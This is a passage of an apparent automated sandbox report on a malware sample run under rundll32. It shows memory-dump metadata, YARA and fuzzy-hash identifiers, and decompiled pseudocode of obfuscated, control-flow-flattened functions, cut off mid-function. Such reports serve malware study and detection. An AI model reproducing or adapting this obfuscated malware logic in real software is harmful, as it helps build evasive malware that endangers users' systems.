                                                                      0x0200da8b
                                                                      0x0200da8e
                                                                      0x0200da93
                                                                      0x0200dacd
                                                                      0x0200da95
                                                                      0x0200daab
                                                                      0x0200dab0
                                                                      0x0200dabb
                                                                      0x0200dac0
                                                                      0x0200dac3
                                                                      0x0200dac3
                                                                      0x00000000
                                                                      0x0200da93
                                                                      0x0200db75
                                                                      0x0200db7a
                                                                      0x0200db7d
                                                                      0x0200db82
                                                                      0x0200db87
                                                                      0x0200db8c
                                                                      0x0200db8c
                                                                      0x0200db8c
                                                                      0x00000000
                                                                      0x0200da2b
                                                                      0x0200da26

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *.$+f$7-$={*$Ry$Zy$,$O$V$]
                                                                      • API String ID: 0-2837054829
                                                                      • Opcode ID: 8e7021d6a34b11ab96211253f25dfe9ee973c5fe254ca709f16987079b6db6d9
                                                                      • Instruction ID: 4d0b841429b6098b62df4eedf40d266c8925949929ff312b57725fe9ca71df9d
                                                                      • Opcode Fuzzy Hash: 8e7021d6a34b11ab96211253f25dfe9ee973c5fe254ca709f16987079b6db6d9
                                                                      • Instruction Fuzzy Hash: 99C166719083419FE358CF65C88940BBBF2FBD5758F004A2DF59A962A0D3B6D919CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0024CC7F, Relevance: 12.8, Strings: 10, Instructions: 258COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *.$+f$7-$={*$Ry$Zy$,$O$V$]
                                                                      • API String ID: 0-2837054829
                                                                      • Opcode ID: 2ed46f64f244493fecafb7046f423cfd3950949ac396ee6e8883002bcc409040
                                                                      • Instruction ID: 49911e5b6def33a48648aaba7dbf1b758e87598cd779775c0d0a8bb4bdf7f1af
                                                                      • Opcode Fuzzy Hash: 2ed46f64f244493fecafb7046f423cfd3950949ac396ee6e8883002bcc409040
                                                                      • Instruction Fuzzy Hash: 60C18671A183419FD358CF25C88A40BBBF2FBD4704F104A2DF59A962A0D3B6D959CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF3B74, Relevance: 12.7, Strings: 10, Instructions: 225COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 97%
                                                                      			E01FF3B74() {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t230;
				intOrPtr* _t236;
				signed int _t239;
				intOrPtr* _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				void* _t247;
				void* _t273;
				signed int* _t277;

				_t277 =  &_v104;
				_v8 = 0x3773eb;
				_v4 = 0;
				_v32 = 0xef71;
				_v32 = _v32 | 0x54f813f9;
				_v32 = _v32 ^ 0xd4f8fff8;
				_v24 = 0x7557;
				_v24 = _v24 << 0xf;
				_v24 = _v24 ^ 0x3aab8002;
				_v40 = 0xe4a5;
				_v40 = _v40 + 0xc2ea;
				_v40 = _v40 ^ 0x0001a89f;
				_v92 = 0x30e1;
				_v92 = _v92 << 5;
				_v92 = _v92 << 5;
				_v92 = _v92 | 0xbe715f5e;
				_v92 = _v92 ^ 0xbef39162;
				_v96 = 0x800f;
				_v96 = _v96 >> 0xc;
				_v96 = _v96 ^ 0x80e6ae84;
				_v96 = _v96 >> 0xe;
				_v96 = _v96 ^ 0x00021582;
				_v44 = 0x11be;
				_v12 = 0;
				_t273 = 0x2fb03e9c;
				_t242 = 0x1d;
				_v44 = _v44 / _t242;
				_v44 = _v44 ^ 0x000025b0;
				_v52 = 0xe658;
				_v52 = _v52 >> 5;
				_v52 = _v52 << 0xc;
				_v52 = _v52 ^ 0x007363dc;
				_v76 = 0x5b3a;
				_t243 = 0x5d;
				_v76 = _v76 * 0x4c;
				_v76 = _v76 ^ 0x14ef7786;
				_v76 = _v76 ^ 0x3048edb2;
				_v76 = _v76 ^ 0x24bca182;
				_v80 = 0xa333;
				_v80 = _v80 / _t243;
				_v80 = _v80 >> 0xd;
				_v80 = _v80 | 0x62916cec;
				_v80 = _v80 ^ 0x629113ba;
				_v28 = 0x738c;
				_v28 = _v28 + 0xfffff99e;
				_v28 = _v28 ^ 0x00000a6b;
				_v56 = 0x3e6f;
				_t244 = 0xc;
				_v56 = _v56 / _t244;
				_v56 = _v56 | 0xe9662750;
				_v56 = _v56 ^ 0xe9666ada;
				_v36 = 0x6860;
				_t245 = 0x2d;
				_v36 = _v36 / _t245;
				_v36 = _v36 ^ 0x00001ef2;
				_v84 = 0x885e;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 << 6;
				_v84 = _v84 + 0xffffce7b;
				_v84 = _v84 ^ 0xffffd5d3;
				_v88 = 0xb8f7;
				_v88 = _v88 ^ 0xd543d054;
				_v88 = _v88 >> 0xb;
				_v88 = _v88 + 0xffffaf1d;
				_v88 = _v88 ^ 0x001a1dea;
				_v60 = 0x284b;
				_v60 = _v60 << 0xc;
				_v60 = _v60 >> 4;
				_v60 = _v60 ^ 0x00281b1d;
				_v72 = 0x3dfc;
				_t246 = 0x58;
				_t239 = _v12;
				_v72 = _v72 / _t246;
				_v72 = _v72 + 0x95dc;
				_v72 = _v72 ^ 0xd14426bc;
				_v72 = _v72 ^ 0xd1448cb1;
				_v48 = 0xe934;
				_v48 = _v48 | 0xd53a3366;
				_v48 = _v48 >> 6;
				_v48 = _v48 ^ 0x03548d4a;
				_v20 = 0x964c;
				_v20 = _v20 * 0x17;
				_v20 = _v20 ^ 0x000de1e5;
				_v100 = 0x9e1;
				_v100 = _v100 ^ 0xf4897f8a;
				_v100 = _v100 ^ 0x36e5ee60;
				_v100 = _v100 | 0xb880b9d7;
				_v100 = _v100 ^ 0xfaecd773;
				_v104 = 0xd03a;
				_v104 = _v104 ^ 0x48aea30f;
				_v104 = _v104 + 0x939c;
				_v104 = _v104 >> 2;
				_v104 = _v104 ^ 0x122bf007;
				_v64 = 0xf900;
				_v64 = _v64 | 0x2edbad32;
				_v64 = _v64 << 0xf;
				_v64 = _v64 | 0x270e07c3;
				_v64 = _v64 ^ 0xff9f7a70;
				_v68 = 0xa250;
				_v68 = _v68 << 0xc;
				_v68 = _v68 + 0x89c3;
				_v68 = _v68 * 0x55;
				_v68 = _v68 ^ 0x5e76c64d;
				while(1) {
					L1:
					_t247 = 0x5c;
					while(1) {
						_t230 = 0x2118c244;
						do {
							L3:
							while(_t273 != 0x1831a392) {
								if(_t273 == _t230) {
									_t236 = E02001EDA(_v100, _t239, _v16, _v104);
									_t273 = 0x371ab96e;
									__eflags = _t236;
									_v12 = 0 | __eflags == 0x00000000;
									goto L1;
								} else {
									if(_t273 == 0x25797f14) {
										_t241 =  *0x2011088 + 0x38;
										while(1) {
											__eflags =  *_t241 - _t247;
											if(__eflags == 0) {
												break;
											}
											_t241 = _t241 + 2;
											__eflags = _t241;
										}
										_t239 = _t241 + 2;
										_t273 = 0x1831a392;
										_t230 = 0x2118c244;
										continue;
									} else {
										if(_t273 == 0x2fb03e9c) {
											_t273 = 0x25797f14;
											continue;
										} else {
											if(_t273 != 0x371ab96e) {
												goto L17;
											} else {
												E020070CF(_v64, _v68, _v16);
											}
										}
									}
								}
								L9:
								return _v12;
							}
							_push(0x1ff1368);
							_push(_v44);
							_push(_v96);
							_t248 = _v40;
							__eflags = E02000A84(E01FF5DFC(_v40, _v92, __eflags), _v52, _v24, _v76, _v80, _v40, _v28, _v40,  &_v16, _v32, _t248, _t248, _v56, _v36, _v84, _v88, _t248, _v60);
							_t273 =  ==  ? 0x2118c244 : 0x27c3a10;
							E02000D6D(_v72, _v48, _v20, _t231);
							_t277 =  &(_t277[0x15]);
							_t230 = 0x2118c244;
							_t247 = 0x5c;
							L17:
							__eflags = _t273 - 0x27c3a10;
						} while (__eflags != 0);
						goto L9;
					}
				}
			}









































                                                                      0x01ff3b74
                                                                      0x01ff3b7b
                                                                      0x01ff3b85
                                                                      0x01ff3b8b
                                                                      0x01ff3b93
                                                                      0x01ff3b9b
                                                                      0x01ff3ba3
                                                                      0x01ff3bab
                                                                      0x01ff3bb0
                                                                      0x01ff3bb8
                                                                      0x01ff3bc0
                                                                      0x01ff3bc8
                                                                      0x01ff3bd0
                                                                      0x01ff3bd8
                                                                      0x01ff3bdd
                                                                      0x01ff3be2
                                                                      0x01ff3bea
                                                                      0x01ff3bf2
                                                                      0x01ff3bfa
                                                                      0x01ff3bff
                                                                      0x01ff3c07
                                                                      0x01ff3c0c
                                                                      0x01ff3c14
                                                                      0x01ff3c1c
                                                                      0x01ff3c20
                                                                      0x01ff3c2b
                                                                      0x01ff3c30
                                                                      0x01ff3c36
                                                                      0x01ff3c3e
                                                                      0x01ff3c46
                                                                      0x01ff3c4b
                                                                      0x01ff3c50
                                                                      0x01ff3c58
                                                                      0x01ff3c65
                                                                      0x01ff3c68
                                                                      0x01ff3c6c
                                                                      0x01ff3c74
                                                                      0x01ff3c7c
                                                                      0x01ff3c84
                                                                      0x01ff3c94
                                                                      0x01ff3c98
                                                                      0x01ff3c9d
                                                                      0x01ff3ca5
                                                                      0x01ff3cad
                                                                      0x01ff3cb5
                                                                      0x01ff3cbd
                                                                      0x01ff3cc5
                                                                      0x01ff3cd1
                                                                      0x01ff3cd6
                                                                      0x01ff3cdc
                                                                      0x01ff3ce4
                                                                      0x01ff3cec
                                                                      0x01ff3cf8
                                                                      0x01ff3cfb
                                                                      0x01ff3cff
                                                                      0x01ff3d07
                                                                      0x01ff3d0f
                                                                      0x01ff3d14
                                                                      0x01ff3d19
                                                                      0x01ff3d21
                                                                      0x01ff3d29
                                                                      0x01ff3d33
                                                                      0x01ff3d40
                                                                      0x01ff3d45
                                                                      0x01ff3d4d
                                                                      0x01ff3d55
                                                                      0x01ff3d5d
                                                                      0x01ff3d62
                                                                      0x01ff3d67
                                                                      0x01ff3d6f
                                                                      0x01ff3d7d
                                                                      0x01ff3d80
                                                                      0x01ff3d84
                                                                      0x01ff3d88
                                                                      0x01ff3d90
                                                                      0x01ff3d98
                                                                      0x01ff3da0
                                                                      0x01ff3da8
                                                                      0x01ff3db0
                                                                      0x01ff3db5
                                                                      0x01ff3dbd
                                                                      0x01ff3dca
                                                                      0x01ff3dce
                                                                      0x01ff3dd6
                                                                      0x01ff3dde
                                                                      0x01ff3de6
                                                                      0x01ff3dee
                                                                      0x01ff3df6
                                                                      0x01ff3dfe
                                                                      0x01ff3e06
                                                                      0x01ff3e0e
                                                                      0x01ff3e16
                                                                      0x01ff3e1b
                                                                      0x01ff3e23
                                                                      0x01ff3e2b
                                                                      0x01ff3e33
                                                                      0x01ff3e38
                                                                      0x01ff3e40
                                                                      0x01ff3e48
                                                                      0x01ff3e50
                                                                      0x01ff3e55
                                                                      0x01ff3e62
                                                                      0x01ff3e66
                                                                      0x01ff3e6e
                                                                      0x01ff3e6e
                                                                      0x01ff3e70
                                                                      0x01ff3e71
                                                                      0x01ff3e71
                                                                      0x01ff3e76
                                                                      0x00000000
                                                                      0x01ff3e76
                                                                      0x01ff3e80
                                                                      0x01ff3eeb
                                                                      0x01ff3ef4
                                                                      0x01ff3ef9
                                                                      0x01ff3efe
                                                                      0x00000000
                                                                      0x01ff3e82
                                                                      0x01ff3e88
                                                                      0x01ff3ec9
                                                                      0x01ff3ed1
                                                                      0x01ff3ed1
                                                                      0x01ff3ed4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ff3ece
                                                                      0x01ff3ece
                                                                      0x01ff3ece
                                                                      0x01ff3ed6
                                                                      0x01ff3ed9
                                                                      0x01ff3e71
                                                                      0x00000000
                                                                      0x01ff3e8a
                                                                      0x01ff3e90
                                                                      0x01ff3ebc
                                                                      0x00000000
                                                                      0x01ff3e92
                                                                      0x01ff3e98
                                                                      0x00000000
                                                                      0x01ff3e9e
                                                                      0x01ff3eaa
                                                                      0x01ff3eaf
                                                                      0x01ff3e98
                                                                      0x01ff3e90
                                                                      0x01ff3e88
                                                                      0x01ff3eb0
                                                                      0x01ff3ebb
                                                                      0x01ff3ebb
                                                                      0x01ff3f07
                                                                      0x01ff3f0c
                                                                      0x01ff3f10
                                                                      0x01ff3f18
                                                                      0x01ff3f6c
                                                                      0x01ff3f8b
                                                                      0x01ff3f8e
                                                                      0x01ff3f93
                                                                      0x01ff3f96
                                                                      0x01ff3f9d
                                                                      0x01ff3f9e
                                                                      0x01ff3f9e
                                                                      0x01ff3f9e
                                                                      0x00000000
                                                                      0x01ff3faa
                                                                      0x01ff3e71

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4$:[$K($P'f$`h$`6$k$0$s7$k
                                                                      • API String ID: 0-1983453149
                                                                      • Opcode ID: 181f08a8f52abf32cc5eb9ddeec183e24ba373f3652c12e540c0ea47d89cc883
                                                                      • Instruction ID: 4fb36872f9206da6834c0f12d74c44d7563430d7e722c8a8b184b79bd24cba8f
                                                                      • Opcode Fuzzy Hash: 181f08a8f52abf32cc5eb9ddeec183e24ba373f3652c12e540c0ea47d89cc883
                                                                      • Instruction Fuzzy Hash: ABB113725093809FE359CF25D88A90FBBE2FBC4748F10891DF595962A0D7B5CA49CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002330E8, Relevance: 12.7, Strings: 10, Instructions: 225COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4$:[$K($P'f$`h$`6$k$0$s7$k
                                                                      • API String ID: 0-1983453149
                                                                      • Opcode ID: 9cb91b622d7dbfd864413f4ab6b3a5654de06be3923bf00214682f10b5a64c76
                                                                      • Instruction ID: 6958330f4a13b84342e64b1132283f202ed0dd40fa3fe352558143046597ccd0
                                                                      • Opcode Fuzzy Hash: 9cb91b622d7dbfd864413f4ab6b3a5654de06be3923bf00214682f10b5a64c76
                                                                      • Instruction Fuzzy Hash: 7CB133B21193809FE399CF25C88A90BBBE1FBC4748F10891DF595962A0D7B5CA59CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF7731, Relevance: 12.7, Strings: 10, Instructions: 191COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 91%
                                                                      			E01FF7731(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* _t170;
				intOrPtr* _t191;
				void* _t193;
				intOrPtr _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				void* _t215;
				signed int* _t217;

				_push(_a20);
				_t191 = __edx;
				_t215 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02002550(_t170);
				_v12 = 0x49dec4;
				_t209 = 0;
				_v8 = 0x408154;
				_t217 =  &(( &_v84)[7]);
				_v4 = 0;
				_v52 = 0x694b;
				_t193 = 0x182a63aa;
				_v52 = _v52 + 0xffff5e5b;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0fff8bf7;
				_v56 = 0x41f7;
				_v56 = _v56 + 0x4138;
				_t210 = 0x11;
				_v56 = _v56 * 0x3c;
				_v56 = _v56 ^ 0x001ebd7f;
				_v24 = 0x2024;
				_v24 = _v24 >> 3;
				_v24 = _v24 ^ 0x000030b8;
				_v28 = 0xded3;
				_v28 = _v28 / _t210;
				_v28 = _v28 ^ 0x00001e19;
				_v32 = 0xc31c;
				_t211 = 9;
				_v32 = _v32 * 0x46;
				_v32 = _v32 ^ 0x00354647;
				_v60 = 0x23e0;
				_v60 = _v60 << 0xa;
				_v60 = _v60 << 3;
				_v60 = _v60 ^ 0x047c537c;
				_v64 = 0xeb08;
				_v64 = _v64 / _t211;
				_v64 = _v64 << 0x10;
				_v64 = _v64 ^ 0x1a1d4286;
				_v68 = 0x30b7;
				_v68 = _v68 | 0x586a18cc;
				_v68 = _v68 ^ 0x9b6ff92b;
				_v68 = _v68 ^ 0xc305ffb2;
				_v84 = 0x4a65;
				_t212 = 0x11;
				_v84 = _v84 * 0x7e;
				_v84 = _v84 + 0x6e5;
				_v84 = _v84 ^ 0x53a45cff;
				_v84 = _v84 ^ 0x5380fb2a;
				_v48 = 0xcc07;
				_v48 = _v48 + 0x32ac;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x0007ae20;
				_v72 = 0xea77;
				_v72 = _v72 * 0x14;
				_v72 = _v72 + 0x41ea;
				_v72 = _v72 / _t212;
				_v72 = _v72 ^ 0x00013230;
				_v16 = 0x78a9;
				_v16 = _v16 + 0xaadf;
				_v16 = _v16 ^ 0x000171b6;
				_v36 = 0x9bd0;
				_v36 = _v36 ^ 0xa8005f8b;
				_v36 = _v36 | 0xb140c83a;
				_v36 = _v36 ^ 0xb940c62b;
				_v76 = 0x6529;
				_v76 = _v76 + 0x50c8;
				_v76 = _v76 | 0xe567bb7e;
				_v76 = _v76 ^ 0xe5678af7;
				_v20 = 0x8b43;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0x8b433351;
				_v40 = 0x866a;
				_t213 = 0x19;
				_t214 = _v16;
				_v40 = _v40 / _t213;
				_v40 = _v40 >> 3;
				_v40 = _v40 ^ 0x00003fe9;
				_v44 = 0xef9a;
				_v44 = _v44 * 0x21;
				_v44 = _v44 << 0xe;
				_v44 = _v44 ^ 0xb8b6d4b8;
				_v80 = 0x5ae9;
				_v80 = _v80 + 0xb2b1;
				_v80 = _v80 | 0x3da6d513;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x003dfd01;
				while(_t193 != 0x182a63aa) {
					if(_t193 == 0x251a2d5f) {
						_t163 =  &_v40; // 0x354647
						E0200B94A(_t209, _t214, _t215, _t193, _t193, _a4, _v72, _v16, _v36, _t193, _v76, _v20,  *_t163, _a20, _v44, _v80);
						if(_t191 != 0) {
							 *_t191 = _t214;
						}
						L14:
						return _t209;
					}
					if(_t193 == 0x2efe34a0) {
						_push(_t193);
						_t209 = E01FF54FB(_t214);
						if(_t209 == 0) {
							goto L14;
						}
						_t193 = 0x251a2d5f;
						continue;
					}
					if(_t193 != 0x34522f7d) {
						L10:
						if(_t193 != 0x226dac5d) {
							continue;
						}
						goto L14;
					}
					_t214 = E0200B94A(0, 0, _t215, _t193, _t193, _a4, _v52, _v56, _v24, _t193, _v28, _v32, _v60, _a20, _v64, _v68);
					_t217 =  &(_t217[0xe]);
					if(_t214 == 0) {
						goto L14;
					}
					_t193 = 0x2efe34a0;
				}
				_t193 = 0x34522f7d;
				goto L10;
			}



































                                                                      0x01ff7738
                                                                      0x01ff773c
                                                                      0x01ff773e
                                                                      0x01ff7740
                                                                      0x01ff7744
                                                                      0x01ff7748
                                                                      0x01ff774c
                                                                      0x01ff7750
                                                                      0x01ff7751
                                                                      0x01ff7752
                                                                      0x01ff7757
                                                                      0x01ff775f
                                                                      0x01ff7761
                                                                      0x01ff7769
                                                                      0x01ff776c
                                                                      0x01ff7772
                                                                      0x01ff777a
                                                                      0x01ff777f
                                                                      0x01ff7787
                                                                      0x01ff778c
                                                                      0x01ff7794
                                                                      0x01ff779c
                                                                      0x01ff77ab
                                                                      0x01ff77ae
                                                                      0x01ff77b2
                                                                      0x01ff77ba
                                                                      0x01ff77c2
                                                                      0x01ff77c7
                                                                      0x01ff77cf
                                                                      0x01ff77df
                                                                      0x01ff77e3
                                                                      0x01ff77eb
                                                                      0x01ff77f8
                                                                      0x01ff77fb
                                                                      0x01ff77ff
                                                                      0x01ff7807
                                                                      0x01ff780f
                                                                      0x01ff7814
                                                                      0x01ff7819
                                                                      0x01ff7821
                                                                      0x01ff7831
                                                                      0x01ff7835
                                                                      0x01ff783a
                                                                      0x01ff7842
                                                                      0x01ff784a
                                                                      0x01ff7852
                                                                      0x01ff785a
                                                                      0x01ff7862
                                                                      0x01ff786f
                                                                      0x01ff7870
                                                                      0x01ff7874
                                                                      0x01ff787c
                                                                      0x01ff7884
                                                                      0x01ff788c
                                                                      0x01ff7894
                                                                      0x01ff789c
                                                                      0x01ff78a1
                                                                      0x01ff78a9
                                                                      0x01ff78b6
                                                                      0x01ff78ba
                                                                      0x01ff78c8
                                                                      0x01ff78cc
                                                                      0x01ff78d6
                                                                      0x01ff78de
                                                                      0x01ff78e6
                                                                      0x01ff78ee
                                                                      0x01ff78f6
                                                                      0x01ff78fe
                                                                      0x01ff7906
                                                                      0x01ff790e
                                                                      0x01ff7916
                                                                      0x01ff791e
                                                                      0x01ff7926
                                                                      0x01ff792e
                                                                      0x01ff7936
                                                                      0x01ff793b
                                                                      0x01ff7943
                                                                      0x01ff7951
                                                                      0x01ff7954
                                                                      0x01ff7958
                                                                      0x01ff795c
                                                                      0x01ff7961
                                                                      0x01ff7969
                                                                      0x01ff7976
                                                                      0x01ff797a
                                                                      0x01ff797f
                                                                      0x01ff7987
                                                                      0x01ff798f
                                                                      0x01ff7997
                                                                      0x01ff799f
                                                                      0x01ff79a4
                                                                      0x01ff79ac
                                                                      0x01ff79be
                                                                      0x01ff7a64
                                                                      0x01ff7a89
                                                                      0x01ff7a93
                                                                      0x01ff7a95
                                                                      0x01ff7a95
                                                                      0x01ff7a97
                                                                      0x01ff7aa0
                                                                      0x01ff7aa0
                                                                      0x01ff79ca
                                                                      0x01ff7a29
                                                                      0x01ff7a2f
                                                                      0x01ff7a34
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ff7a36
                                                                      0x00000000
                                                                      0x01ff7a36
                                                                      0x01ff79d2
                                                                      0x01ff7a45
                                                                      0x01ff7a4b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ff7a51
                                                                      0x01ff7a0f
                                                                      0x01ff7a11
                                                                      0x01ff7a16
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ff7a18
                                                                      0x01ff7a18
                                                                      0x01ff7a40
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $ $)e$GF5$Ki$}/R4$}/R4$#$?$A$Z
                                                                      • API String ID: 0-3391024520
                                                                      • Opcode ID: 0781afec3e73dc80d09e5051321a0b1847496af7c9a5a3afd5f875a495ca2731
                                                                      • Instruction ID: 4b22808c99a1425bac4c3f91a3df6376c047b37ecc58e1da51c7676ebe7573c6
                                                                      • Opcode Fuzzy Hash: 0781afec3e73dc80d09e5051321a0b1847496af7c9a5a3afd5f875a495ca2731
                                                                      • Instruction Fuzzy Hash: FD9114724083809FE359DF65C58981BFBE1BFC4758F404A0DF29696260D3BA8A59CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00236CA5, Relevance: 12.7, Strings: 10, Instructions: 191COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $ $)e$GF5$Ki$}/R4$}/R4$#$?$A$Z
                                                                      • API String ID: 0-3391024520
                                                                      • Opcode ID: 83fa3a6d39f62124582cc2ab0c530ec1acd6d0060c970106ab7acc3fc01164da
                                                                      • Instruction ID: 46f534afebe628f1ba0d4d6e89e758ecf9f991cd7a09cd4e82381cfbb582a58d
                                                                      • Opcode Fuzzy Hash: 83fa3a6d39f62124582cc2ab0c530ec1acd6d0060c970106ab7acc3fc01164da
                                                                      • Instruction Fuzzy Hash: 1D9134B2018381AFE759CF65C98980BFBE5BFC4758F50890DF19296260D3BA8959CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0200B165, Relevance: 11.6, Strings: 9, Instructions: 322COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 96%
                                                                      			E0200B165(signed int __ecx, intOrPtr* __edx) {
				signed int _t355;
				void* _t362;
				short* _t366;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				signed int _t376;
				signed int _t377;
				short _t412;
				void* _t415;
				intOrPtr* _t419;
				void* _t421;

				 *(_t421 + 0x94) = 0x72b2ac;
				 *(_t421 + 0x98) = 0x3313a1;
				_t412 = 0;
				 *(_t421 + 0xa0) = __ecx;
				 *((intOrPtr*)(_t421 + 0xac)) = 0;
				_t419 = __edx;
				 *(_t421 + 0x28) = 0x912c;
				 *(_t421 + 0x28) =  *(_t421 + 0x28) | 0x96fb441e;
				_t415 = 0x7c0af2;
				_t371 = 0x53;
				 *(_t421 + 0x2c) =  *(_t421 + 0x28) / _t371;
				_t372 = 0x54;
				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) / _t372;
				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) ^ 0x00058b38;
				 *(_t421 + 0x5c) = 0xc013;
				 *(_t421 + 0x5c) =  *(_t421 + 0x5c) | 0xaee1eb4d;
				_t373 = 0x12;
				 *(_t421 + 0x58) =  *(_t421 + 0x5c) * 0x6b;
				 *(_t421 + 0x58) =  *(_t421 + 0x58) ^ 0x186d60a5;
				 *(_t421 + 0x3c) = 0xace2;
				 *(_t421 + 0x3c) =  *(_t421 + 0x3c) << 6;
				 *(_t421 + 0x3c) =  *(_t421 + 0x3c) + 0x7229;
				 *(_t421 + 0x3c) =  *(_t421 + 0x3c) ^ 0x402baaa9;
				 *(_t421 + 0x14) = 0xebdd;
				 *(_t421 + 0x14) =  *(_t421 + 0x14) >> 0xe;
				 *(_t421 + 0x14) =  *(_t421 + 0x14) * 6;
				 *(_t421 + 0x14) =  *(_t421 + 0x14) + 0xffffac6e;
				 *(_t421 + 0x14) =  *(_t421 + 0x14) ^ 0xffff9658;
				 *(_t421 + 0x7c) = 0xde69;
				 *(_t421 + 0x7c) =  *(_t421 + 0x7c) * 0x6f;
				 *(_t421 + 0x7c) =  *(_t421 + 0x7c) ^ 0x006039f6;
				 *(_t421 + 0x6c) = 0x3341;
				 *(_t421 + 0x6c) =  *(_t421 + 0x6c) / _t373;
				 *(_t421 + 0x6c) =  *(_t421 + 0x6c) * 0x2e;
				 *(_t421 + 0x6c) =  *(_t421 + 0x6c) ^ 0x0000be9a;
				 *(_t421 + 0x1c) = 0xbddd;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) * 0x3d;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) >> 8;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) + 0x3ffb;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) ^ 0x000052ea;
				 *(_t421 + 0x24) = 0xcd1f;
				 *(_t421 + 0x24) =  *(_t421 + 0x24) >> 0xa;
				 *(_t421 + 0x24) =  *(_t421 + 0x24) + 0xc8ca;
				 *(_t421 + 0x24) =  *(_t421 + 0x24) + 0xffff7446;
